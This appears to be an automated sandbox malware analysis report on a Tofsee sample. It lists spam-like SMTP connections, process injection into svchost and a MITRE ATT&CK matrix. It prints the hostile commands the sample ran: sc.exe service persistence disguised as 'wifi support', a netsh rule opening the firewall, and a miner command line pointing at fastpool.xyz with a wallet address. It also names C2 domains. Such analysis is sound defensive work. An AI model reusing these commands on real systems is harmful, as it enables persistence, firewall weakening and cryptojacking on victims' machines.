Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.56.146.42 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.56.146.43 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 200.58.111.200 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: medtronic.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 148.163.152.155 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: smtp.yopmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: online.fr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mta7.am0.yahoodns.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxa-00204301.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 125.209.238.137 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: microsoft-com.mail.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.sbl-xbl.spamhaus.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 194.25.134.8 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbgpromotions.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 208.77.151.115 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 13.94.144.32 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: alt1.aspmx.l.google.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.bl.spamcop.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.free.fr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pgcps.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 64.98.36.4 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lambda.uniform.thefreemail.top
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bacavalley.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 108.177.119.27 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx00.t-online.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 108.177.119.26 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: smtp-in.sfr.fr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: minit-europe.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: netscape.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: conex.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: baccaro.eu
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dignityhealth.org
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: syd.catholic.edu.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: whiskeyiota.webmailious.top
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hughes-walker.co.uk
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hotmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.lb.btinternet.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 208.80.202.60 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: online.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hanmail.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ff-ip4-mx-vip2.prodigy.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: live.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: flash.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 217.74.65.64 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: defeatwax.ru
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxa-003d3601.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mhtn.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: www.google.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yahoo.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: 41.52.17.84.dnsbl.sorbs.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: antispam.minit-europe.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cox.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.66.33 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx01.emig.gmx.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: wp.eu
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.wp.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbgriffin.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx2.naver.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: epicgames.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cxr.mx.a.cloudfilter.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: naver.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 176.9.75.42 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.219.246.204 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: controlling-cz.mail.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 212.227.17.5 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: emig.freenet.de
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: e.gsasearchengineranker.site
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx00.mail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: aol.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 148.163.152.163 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.204.80 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bacavalley.com.mx1.greymail.rcimx.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.73.137.222 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lycos.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: bellsouth.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.101.24.0 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.217.168.68 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.217.168.67 443	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gmx.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: email.cz
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: nam.olc.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 67.195.204.79 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 172.65.252.97 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.powered.name
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: icloud.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: noos.fr
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbfestival.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hamstermail.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: live-com.olc.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: op.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mailstream-east.mxrecord.io
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: metropharm.com.au
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mxb-00116001.gslb.pphosted.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.227.140.23 423	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 144.160.235.144 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: colpal.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: att.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: in1-smtp.messagingengine.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 148.163.152.7 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 193.56.146.188 487	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dbfletcher.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 17.42.251.10 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 66.111.4.70 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: me.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 144.160.159.22 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: dberney.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx4.hanmail.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.netsolmail.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: comcast.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 18.185.115.251 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx2.ik2.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.53.36 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: rocketmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.58.161 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: seznam.cz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 198.54.122.213 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx1.seznam.cz
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.180.147.146 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx03.cloud.vadesecure.com
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 213.91.128.133 76	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.22.161 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.13.36 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.13.33 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 3.130.46.147 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 178.32.124.207 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx.poczta.onet.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail.vallipartners.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: yopmail.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: interia.pl
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mx-aol.mail.gm0.yahoodns.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: pupa.it
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: gamil.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: lowes.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mta6.am0.yahoodns.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: mail.h-email.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: ASPMX.L.GOOGLE.COM
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: sigaint.org
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 93.17.128.123 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 104.47.58.33 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 52.47.149.86 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 205.220.166.52 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: agilysse.fr
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 77.75.76.42 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: cegetel.net
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: al-ip4-mx-vip2.prodigy.net
Source: C:\Windows\SysWOW64\svchost.exe	Network Connect: 212.227.15.40 25	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: hotmail-com.olc.protection.outlook.com
Source: C:\Windows\SysWOW64\svchost.exe	Domain query: aspmx.l.google.com

Allocates memory in foreign processes

Show sources

Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe

Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 570000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Show sources

Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 570000 value starts with: 4D5A			Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AE0000 value starts with: 4D5A			Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 570000			Jump to behavior
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Memory written: C:\Windows\SysWOW64\svchost.exe base: 66B008			Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\mmeemcze\	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\kwrovuui.exe' C:\Windows\SysWOW64\mmeemcze\	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' create mmeemcze binPath= 'C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe /d\'C:\Users\user\Desktop\HsWJJz7nq4.exe\'' type= own start= auto DisplayName= 'wifi support'	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' description mmeemcze 'wifi internet conection'	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\sc.exe 'C:\Windows\System32\sc.exe' start mmeemcze	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Process created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul	Jump to behavior
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half	Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00406EDD AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00406EDD

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00407809 CreateThread,GetUserNameA,LookupAccountNameA,GetLengthSid,GetFileSecurityA,GetSecurityDescriptorOwner,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetFileSecurityA,LocalFree,GetSecurityDescriptorDacl,GetAce,EqualSid,DeleteAce,EqualSid,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,SetFileSecurityA,LocalFree,

0_2_00407809

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_0040EC54 GetSystemTimeAsFileTime,GetVolumeInformationA,GetTickCount,

0_2_0040EC54

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_0040B211 FileTimeToSystemTime,GetLocalTime,FileTimeToLocalFileTime,FileTimeToSystemTime,SystemTimeToFileTime,FileTimeToSystemTime,GetTimeZoneInformation,wsprintfA,

0_2_0040B211

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

0_2_00407809

Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe

Code function: 14_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,

14_2_0040405E

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Code function: 0_2_00409326 GetVersionExA,GetModuleHandleA,GetModuleFileNameA,wsprintfA,wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,

0_2_00409326

Lowering of HIPS / PFW / Operating System Security Settings:

Uses netsh to modify the Windows network and firewall settings

Show sources

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Process created: C:\Windows\SysWOW64\netsh.exe 'C:\Windows\System32\netsh.exe' advfirewall firewall add rule name='Host-process for services of Windows' dir=in action=allow program='C:\Windows\SysWOW64\svchost.exe' enable=yes>nul

Modifies the windows firewall

Show sources

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe

Stealing of Sensitive Information:

Yara detected Tofsee

Show sources

Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.2230e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.kwrovuui.exe.2180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2230000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HsWJJz7nq4.exe.2250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2230000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2160e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665871062.0000000002230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.664485787.0000000002180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.643630802.0000000002250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HsWJJz7nq4.exe PID: 5588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kwrovuui.exe PID: 5672, type: MEMORYSTR

Remote Access Functionality:

Yara detected Tofsee

Show sources

Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.2230e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.3.kwrovuui.exe.2180000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2230000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.HsWJJz7nq4.exe.2250000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2230000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.kwrovuui.exe.2160e50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.HsWJJz7nq4.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.656347159.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.656635661.0000000002230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665832793.0000000002160000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665499357.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.665871062.0000000002230000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000003.664485787.0000000002180000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.643630802.0000000002250000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: HsWJJz7nq4.exe PID: 5588, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kwrovuui.exe PID: 5672, type: MEMORYSTR

Source: C:\Users\user\Desktop\HsWJJz7nq4.exe	Code function: 0_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,		0_2_004088B0
Source: C:\Windows\SysWOW64\mmeemcze\kwrovuui.exe	Code function: 14_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,		14_2_004088B0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	Application Shimming1	Application Shimming1	Disable or Modify Tools2	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Service Execution3	Valid Accounts1	Valid Accounts1	Deobfuscate/Decode Files or Information1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Windows Service14	Access Token Manipulation1	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Standard Port1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Windows Service14	Software Packing13	NTDS	System Information Discovery15	Distributed Component Object Model	Input Capture	Scheduled Transfer	Non-Application Layer Protocol3	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Process Injection412	File Deletion1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Application Layer Protocol124	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Masquerading12	Cached Domain Credentials	Security Software Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Valid Accounts1	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Modify Registry1	Proc Filesystem	Application Window Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Virtualization/Sandbox Evasion1	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Access Token Manipulation1	Network Sniffing	Remote System Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Process Injection412	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop
Compromise Software Supply Chain	Unix Shell	Launchd	Launchd	NTFS File Attributes1	Keylogging	Local Groups	Component Object Model and Distributed COM	Screen Capture	Exfiltration over USB	DNS			Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
HsWJJz7nq4.exe	32%	Virustotal		Browse
HsWJJz7nq4.exe	33%	ReversingLabs	Win32.Infostealer.Convagent
HsWJJz7nq4.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\kwrovuui.exe	100%	Avira	TR/ATRAPS.Gen2
C:\Users\user\AppData\Local\Temp\kwrovuui.exe	100%	Joe Sandbox ML

Unpacked PE Files

Source	Detection	Scanner	Label	Download
14.2.kwrovuui.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
18.3.svchost.exe.af00000.2.unpack	100%	Avira	TR/Crypt.XPACK.Gen8	Download File
14.3.kwrovuui.exe.2180000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.1.HsWJJz7nq4.exe.400000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.HsWJJz7nq4.exe.2230e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.HsWJJz7nq4.exe.2250000.0.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.HsWJJz7nq4.exe.400000.0.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
14.2.kwrovuui.exe.2230000.2.unpack	100%	Avira	BDS/Backdoor.Gen	Download File
14.2.kwrovuui.exe.2160e50.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File

Domains

Source	Detection	Scanner	Link
energyjustice.net	0%	Virustotal	Browse
ff-ip4-mx-vip2.prodigy.net	0%	Virustotal	Browse
hosting.next-provider.net	0%	Virustotal	Browse
mx.xtra.co.nz	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label
defeatwax.ru:443	0%	Avira URL Cloud	safe
http://www.bsalsa.com/	0%	Avira URL Cloud	safe
refabyd.info:443	0%	Avira URL Cloud	safe

Domains and IPs

